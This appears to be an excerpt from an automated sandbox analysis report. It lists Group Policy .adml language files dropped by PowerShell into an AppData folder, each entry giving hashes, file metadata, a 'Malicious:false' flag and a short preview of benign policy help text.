                                                                                          MD5:B04329C131F6270E21143E3A48884E73
                                                                                          SHA1:21A2CA3E301813810D7B3874D625C4FABC5DD96A
                                                                                          SHA-256:17A7E0C29F6FAD55F06306ECE4251A6BF7D40BB30C3178385D01CFFC805A1164
                                                                                          SHA-512:E50307FA3358D4CAC0C2CE8C5DFD568DDC0795E07DD38A5F655C6BF0F2F071B8D5479D6F89483959054B7256E0BCB09631F8E902B64F0F19CBB051030815633E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HideSCABattery">Remove the battery meter</string>.. <string id="HideSCABattery_Help">This policy setting allows you to remove the battery meter from the system control area.....If you enable this policy setting, the battery meter is not displayed in the system notification area.....If you disable or do not configure this policy setting, the battery meter is displayed in the system notification area.</string>.. <string id="HideSCANetwork">Remove the networking icon</string>.. <string id="HideSCANetwor

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TerminalServer-Server.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (495), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):19641
                                                                                          Entropy (8bit):4.878122311324998
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:HTFGnX5V42B4kc7w3p98BlDJQ2yhfOBV41eCFksM08wjblv:HTI5/b2KfSiNbh
                                                                                          MD5:F835CA2B1226B25600345F974B8706C4
                                                                                          SHA1:1B7BA254D3835BA025A8D68A8AC757019081AA09
                                                                                          SHA-256:E827705FA042FDD68C493B5F0159FE68B10F6B310C957A7F23F45F20DB14666E
                                                                                          SHA-512:183483215CAE2BA72A226AC50F6057D566A23E411C3BAABF0BBBBB6145046E85049F4B526CDA4591C145F6A92AB75567661885EDCECCE13B60EC0C00DD8E28FA
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_APP_COMPATIBILITY">Application Compatibility</string>.. <string id="TS_APP_COMPATIBILITY_Help">Controls application compatibility settings on an RD Session Host server</string>.. <string id="TS_TIME_ZONE">Allow time zone redirection</string>.. <string id="TS_TIME_ZONE_EXPLAIN">This policy setting allows you to specify whether the client computer redirects its time zone settings to the Remote Desktop Services session.....If you enable this policy setting, clients that are capable of time zone redir

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TerminalServer.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (638), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):127562
                                                                                          Entropy (8bit):4.836430182678649
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:9h4lfgUCtmBM22pFN8z0u753oq+I/jIqGUZRGUCFUvyP+YA4RhVjn:9hrtHrzGDiI/jIqGYRGQi3Vjn
                                                                                          MD5:3602B346F09097D79EAA8029915B67F9
                                                                                          SHA1:4BB802511857288C2ADA07AD532CB19E7CD5CD9D
                                                                                          SHA-256:FF74BE25815C0CA023FAD48EA35E6FA32566065485534D01842D617EB39F8ACE
                                                                                          SHA-512:77DDACF30B5D72A159A726FE040218F25D8E902C58CAE6D100F8B01255415C461C55A3645F643FB52D63B8079F0FCE6107CB96358EBBC7141A380D445C4B195A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_SUPPORTED_Windows8_or_ARM">At least Windows 8 or Windows RT</string>.. <string id="TS_SUPPORTED_Windows8_Server">At least Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_Windows8_Enterprise_AND_Server"> At least Windows 8 Enterprise or Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_ONLY_Windows7_OR_SERVER2K8R2">Windows 7 or Windows Server 2008 R2 (and their subsequent Service Packs) only</string>.. <string id="TS_SUPPORTED_ONLY_LEGACY">Windows Server 2008 R2, Windows Se

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Thumbnails.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2359
                                                                                          Entropy (8bit):4.864135463263543
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKlmesQ6SmH6Se6dSGH6crboeoO6S86Ss6dS6H6cr3DJUlptRdpEFV:LeD5pm5mZymDm8rboB8OwAr3DJUlfv2n
                                                                                          MD5:9DDDBE09EE87B401376670F58F52B8CB
                                                                                          SHA1:3E3D3EFB918717C290B5E1FAAA19721160449A05
                                                                                          SHA-256:36E567DB6F269F42865BC122835CBF10C7DE187AFF70BA93BA81C045486A134A
                                                                                          SHA-512:10A5388C2C26BCAB4E38A9507A958BA2A33A09184F003632C51C9405376E43CE27E96C3F7812C51766DD71855ACD81F1ACF4B096EA263F44C2B9623663C04738
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableThumbnails">Turn off the display of thumbnails and only display icons.</string>.. <string id="DisableThumbnails_Help">This policy setting allows you to configure how File Explorer displays thumbnail images or icons on the local computer.....File Explorer displays thumbnail images by default. ....If you enable this policy setting, File Explorer displays only icons and never displays thumbnail images.....If you disable or do not configure this policy setting, File Explorer displays only thumbnail images.<

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\TouchInput.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2055
                                                                                          Entropy (8bit):4.807218997990388
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKKU6oYecyziGWMlHqf+encFV:LeD5pm9HAd+FV
                                                                                          MD5:9562339E02D38BECE2D7D3C89EE47766
                                                                                          SHA1:1512A1230E2585B62FB78E1EE9E147FBCCF91D8F
                                                                                          SHA-256:A376991D45DD68CD83E2A76C75F136B75033FDE16297EC2868755268AF2869E2
                                                                                          SHA-512:531900F6AAADECA8DEF9C70F2E2D9A1A930237EE3E74CB1CF1172A2637DB340382E5108BD138F701CB533643EEA2514C2C43A1CC373B7F1EEB2FF103BCBF4AD5
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TouchInput">Touch Input</string>.. <string id="TouchInputOff">Turn off Tablet PC touch input</string>.. <string id="TouchInputOff_Help">Turn off Tablet PC touch input....Turns off touch input, which allows the user to interact with their computer using their finger.....If you enable this setting, the user will not be able to produce input with touch. They will not be able to use touch input or touch gestures such as tap and double tap, the touch pointer, and other touch-specific features.....If you disabl

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\UserProfiles.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (658), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):43896
                                                                                          Entropy (8bit):4.667568456685799
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:FkIqBn46Y+xwhTjlMIbNzjWtqqnOTLTn8Gu/:Fkze+xwhTjlPWttSvnnA
                                                                                          MD5:5F55E2D434E9BE9D2AC4108C2AE42106
                                                                                          SHA1:6785C7EF4F183004F4F9CCF9D383DABF8914BFF3
                                                                                          SHA-256:D9459CCAD7106CC5A8665076C9D74C39D211D11A6F33870385528389826264D9
                                                                                          SHA-512:6109AEFDA8D656767F0A00C75F2241A454D85AA51B36338E1F5103A96BD32BB5B6571183132FD2468AE74A298623E7000A6F1C94F5760E55C92EB6DD01537BB0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AddAdminGroupToRUP">Add the Administrators security group to roaming user profiles</string>.. <string id="AddAdminGroupToRUP_Help">This policy setting adds the Administrator security group to the roaming user profile share.....Once an administrator has configured a user's roaming profile, the profile will be created at the user's next login. The profile is created at the location that is specified by the administrator.....For the Windows XP Professional and Windows 2000 Professional operating systems, the defa

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\VolumeEncryption.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1087), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):97809
                                                                                          Entropy (8bit):4.865980267514194
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:yF3hamxu6iF2VflT2VfD7oaV6Z32VfDt2Kn+DZcZy:NYTNR96Zy
                                                                                          MD5:11CDF6A637203126A5F35982F599C1AF
                                                                                          SHA1:6E92BB3C55BAD050302EAFD9C7A722798B9FC0F1
                                                                                          SHA-256:CC9BCBDB2FBBD9B3A529CFEFAEE37231BE9D712840E0FBD456D8AF9947E15F14
                                                                                          SHA-512:AB39EA7CE5C379C90D4BAF6F4C506CDBDA17F29D75050CA10E713275EFAB609E0FBCD2B08E3D80E3F8EDCB410192B96C272789D10C1B71D9698B58BD75C6FE4A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of BitLocker Drive Encryption recovery information. This provides an administrative method of recovering data encrypted by BitLocker to prevent data loss due to lack of key information. This policy setting is only applicable to computers running Windows Server 2008 or Windows Vista.....If you enable this policy setting, BitLocker recovery information is automatically and silently backed up to AD

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\W32Time.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (721), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):16499
                                                                                          Entropy (8bit):4.944041721958569
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:A/mnOQzg68GwhRsw6uHGtY2PQJyGizYTO2jF4TTt:JnORtuYTOmF4TTt
                                                                                          MD5:7FAF3A73C8DBAE90E511742BBB51AADD
                                                                                          SHA1:D651E3B70B5C8A6CE7FDCD92D15189CB6880A361
                                                                                          SHA-256:B62D8648EB65A947AE783F67A0E3F2276545DF1CD265CF4AA513DC53DF6882E0
                                                                                          SHA-512:74A1533992353ADFD8E33365AE91DC7CF914A488D5E406D537344FE6F3565AB669DF221082E96DE47E172A4916B695B27499E129BAA9C8FB9B51C9EB264196BD
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="W32TIME_CONFIG_EXPLAIN">This policy setting allows you to specify Clock discipline and General values for the Windows Time service (W32time) for domain controllers including RODCs.....If you enable this policy setting, you can specify the following Clock discipline, General and RODC parameters for this service.....If you disable or do not configure this policy setting, Windows Time service uses the defaults of each of the following parameters.....Several of the following values are scalar, which means that they on

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WCM.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (583), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5728
                                                                                          Entropy (8bit):4.528195330790601
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmuOd2s+XGRFUv41c845cJ6RygNEfHZbWvK64kqo5UidD/PPTifE8h2WNOFV:EdOd2/XGbbqcSlNEf5CvWo5Ui9/n+MGW
                                                                                          MD5:7D5B3A4F151213CB0EFDACFA335A6AA3
                                                                                          SHA1:F36C9F3F58804077CE1AB9D41B29073D1E988752
                                                                                          SHA-256:5EC9152E44738D44848AB532D269EC0D51612FD60B5FA8A7A3D53DC0395164A2
                                                                                          SHA-512:C4DBFA582B75C32016FFE6AF8B5BEBFE2C9DBEB3A80BF1F8319CB1EAF76B043632E0E7A043457263EC41448A74C411920121EB194D04180E712C347F15F27EA7
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Connection Manager Group Policy Settings</displayName>.. <description>Windows Connection Manager Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WCM_Category">Windows Connection Manager</string>.. <string id="WCM_BlockNonDomain">Prohibit connection to non-domain networks when connected to domain authenticated network</string>.. <string id="WCM_BlockNonDomain_Help">This policy setting prevents computers from connecting to both a domain based network and a non-domain based network at the same time... .. If this policy setting is enabled, the computer responds to automatic and manual networ

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WDI.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (513), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3666
                                                                                          Entropy (8bit):4.76342138021097
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKMs4jm9y1YJWl5p0BsYlvPB9ZMKFdL5dbsEIqALJ/PUq1XWgV:LeD5pmYs4jkWlnCsKPB9ZRJHYV/PptV
                                                                                          MD5:3C7A58453A2A54C65A82137819FCBFA2
                                                                                          SHA1:635B1128546EA8A86DD984ADDE64BA1D0B8961A0
                                                                                          SHA-256:4A49D6F192FF5E859FE003DB2584049D5F54615F80E5B977156F7D51F4752105
                                                                                          SHA-512:DD3B7A0BE79E23F4B477080468B74BDA4D23730A2177DC4A092893718B2F0C2192AEB2885C60E0F2DF48AD0AA65E55535A61251325C1DFBB74844C867573139A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiDpsScenarioDataSizeLimitPolicy">Diagnostics: Configure scenario retention</string>.. <string id="WdiDpsScenarioDataSizeLimitPolicyExplain">This policy setting determines the data retention limit for Diagnostic Policy Service (DPS) scenario data.....If you enable this policy setting, you must enter the maximum size of scenario data that should be retained in megabytes. Detailed troubleshooting data related to scenarios will be retained until this limit is reached.....If you disable or do not configure this p

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WPN.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7410
                                                                                          Entropy (8bit):4.5477372257913125
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmIA4ik0bcMuEB4odMuQ0AuwsurKK4GA1TunDzDsZwuE7MteWQPyqyjV:EQkdMuEWCMuesurKKHKTuAwuE7MIWKxA
                                                                                          MD5:77C2A2EB749EBCA17124B632612CE191
                                                                                          SHA1:3B7F2E4594DB1D354755184C0127825F6A81E7D5
                                                                                          SHA-256:058509712BF20A49CC276BDF4AB6B0CCDC3550501DA0F2C4529E234E9AAE6068
                                                                                          SHA-512:6FC63B4998C6E746D82F5680FB67BE2CEADC227EFFE5A07DFF1E94E69A1711AD207EA4481DF25E722D57BBBCFD14F4C395C086D06E3071D1237099C8518AB313
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NotificationsCategory">Notifications</string>.. <string id="NoTileNotification">Turn off tile notifications</string>.. <string id="NoTileNotificationExplain">.. This policy setting turns off tile notifications..... If you enable this policy setting, applications and system features will not be able to update their tiles and tile badges in the Start screen..... If you disable or do not configure this policy setting, tile and badge notifications are enabled and can be turned off b

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WinCal.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1085
                                                                                          Entropy (8bit):4.9989682223802285
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yIjoCg/IPGISwIIPFV:cgeD5x8gm8fK/DPlEIPFV
                                                                                          MD5:8D40CA00FF9CB0AEABED1F9B98D06B2B
                                                                                          SHA1:9B8819C7D0DB7C760990DE409BDE733A8BA179CC
                                                                                          SHA-256:5D5FD8758FFCD1BCB7A28025E05D5749AC4B691ADF0B9E2589C096B75E5DC5C4
                                                                                          SHA-512:4978350FE3A30EA539B38C0322D00F6853CE1227FB15859FD98BC8A655B4949E8B633622D41AC22552280624BE5E017A4566198BC6FF896A25A8BA83D8825AA8
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffWinCal">Turn off Windows Calendar</string>.. <string id="TurnOffWinCal_Explain">Windows Calendar is a feature that allows users to manage appointments and tasks by creating personal calendars, publishing them, and subscribing to other users calendars.....If you enable this setting, Windows Calendar will be turned off.....If you disable or do not configure this setting, Windows Calendar will be turned on.....The default is for Windows Calendar to be turned on.</string>.. <string id="WinCal">Windows

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WinInit.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2477
                                                                                          Entropy (8bit):4.814838125716894
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yaGryIBOKOxOZghgBMZvGM2MWIxTgbaoR01bF2jV:cgeD5x8gm8fKeBOVx2ghUD92YN7V
                                                                                          MD5:0CDEAB62595877530194386C7F6A6661
                                                                                          SHA1:1F0AA6E09C0C4123912F41639AB16534669D374E
                                                                                          SHA-256:00FF3D345DDD3586734720DDDE1E688A31AC0CA468ED85B8A322CBCFD4BB03EE
                                                                                          SHA-512:C1CE4AB1F1878E7DFE16DBC6065E9145EEB23914208F5C0A815D4DC18B4BFD5DF5BB588E6042F80E1EAB56001F5BFD8EF5F1CA061EF43D1440B3215FCE774B91
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNamedPipeShutdownPolicyDescription">Turn off legacy remote shutdown interface</string>.. <string id="DisableNamedPipeShutdownPolicyDescription_Help">This policy setting controls the legacy remote shutdown interface (named pipe). The named pipe remote shutdown interface is needed in order to shutdown this system from a remote Windows XP or Windows Server 2003 system.....If you enable this policy setting, the system does not create the named pipe remote shutdown interface.....If you disable or do not conf

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WinLogon.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (530), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8978
                                                                                          Entropy (8bit):4.691590472306916
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Ehq33S6hDBnHY0+4F1QvJNF1QmQcZNDoFYuu/+AsdegiYKECaVBMi8JfRs:mqBFUhYXZMi8c
                                                                                          MD5:AD266AC436809BBDC0A19A05E80904A8
                                                                                          SHA1:9515ABF43047427E1A13E2930C9AB6C171C6EA0B
                                                                                          SHA-256:0E5BA42E689B38880E0DCB236FC16C4EB9E1809DC94CFCF5AA511B79FAFBA26F
                                                                                          SHA-512:2B27F8DA69CDFB4423C954DC402FD7234C9F462E849F2687FFFD9E00CDEF23FF5EFA8D7A59E7640BAFC96633C0929A0136F5DCED52CA1ECD8ED2C15FBA8D1DC7
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisplayLastLogonInfoDescription">Display information about previous logons during user logon</string>.. <string id="DisplayLastLogonInfoDescription_Help">This policy setting controls whether or not the system displays information about previous logons and logon failures to the user.....For local user accounts and domain user accounts in domains of at least a Windows Server 2008 functional level, if you enable this setting, a message appears after the user logs on that displays the date and time of the last suc

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Windows.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7341
                                                                                          Entropy (8bit):5.050859952546844
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:7t/qF4BH/2pten9EVDEVhclKekhlJDnfQn:8bAeYlJDnU
                                                                                          MD5:091AE0EC426BBE821C7C4A313FA3E5A5
                                                                                          SHA1:013191A0FEF6551C71BCBD5823D0DC6C02867906
                                                                                          SHA-256:FD871C109B4BE893167D85E6C37792B70E2F251DDB9370D039161E3FE735BDCC
                                                                                          SHA-512:9971AB9D1272594663E6BDEC25110E6116B39C5101C70177ED846E3D4D78A8FE8F23326D559B0D420404D1ADE94AD93FC774000A6B1B372583D54863F5B34A72
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by operating system components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsVistaOrServer2008Only">Windows Server 2008 and Windows Vista</string>.. <string id="SUPPORTED_AllowWebPrinting">Windows 2000 or later, running IIS. Not supported on Windows Server 2003.</string>.. <string id="SUPPORTED_IE6SP1">At least Internet Explorer 6 Service Pack 1</string>.. <string id="SUPPORTED_Win2k">At least Windows 2000</string>.. <s

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsAnytimeUpgrade.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1059
                                                                                          Entropy (8bit):5.0665762842091135
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yFvHzJCFEpFlurFV:cgeD5x8gm8fKeLoFalurFV
                                                                                          MD5:42A08790F9D22D63FC6D832BC97CAB7C
                                                                                          SHA1:1EAADF4115A41993AEA94D99AD23034C88DA243B
                                                                                          SHA-256:38866CDAD4284842C711350A8E5E9A0E3743B21BB66F0D849073FD73D4137A0F
                                                                                          SHA-512:4DC9EC52BE0CA470CCAE39A62E6674610151BDA10395874548A47036EDF72C861A016D66B3ED38A1892BCB17B3A67A3371B6D29C7A1B37B76321064B6A81288D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WAU">Add features to Windows 8.1</string>.. <string id="WAU_Help">Contains settings to control the behavior of the Add features to Windows 8.1 wizard.</string>.. <string id="DisableWAU">Prevent the wizard from running.</string>.. <string id="DisableWAU_Help">By default, Add features to Windows 8.1 is available for all administrators. ....If you enable this policy setting, the wizard will not run.....If you disable this policy setting or set it to Not Configured, the wizard will run.</string>.. </s

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsBackup.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3483
                                                                                          Entropy (8bit):4.819976484985464
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5J8FGj3Hzx+h1Pi1DjP3xYPXUrP/bFV:LeD5OuLFV
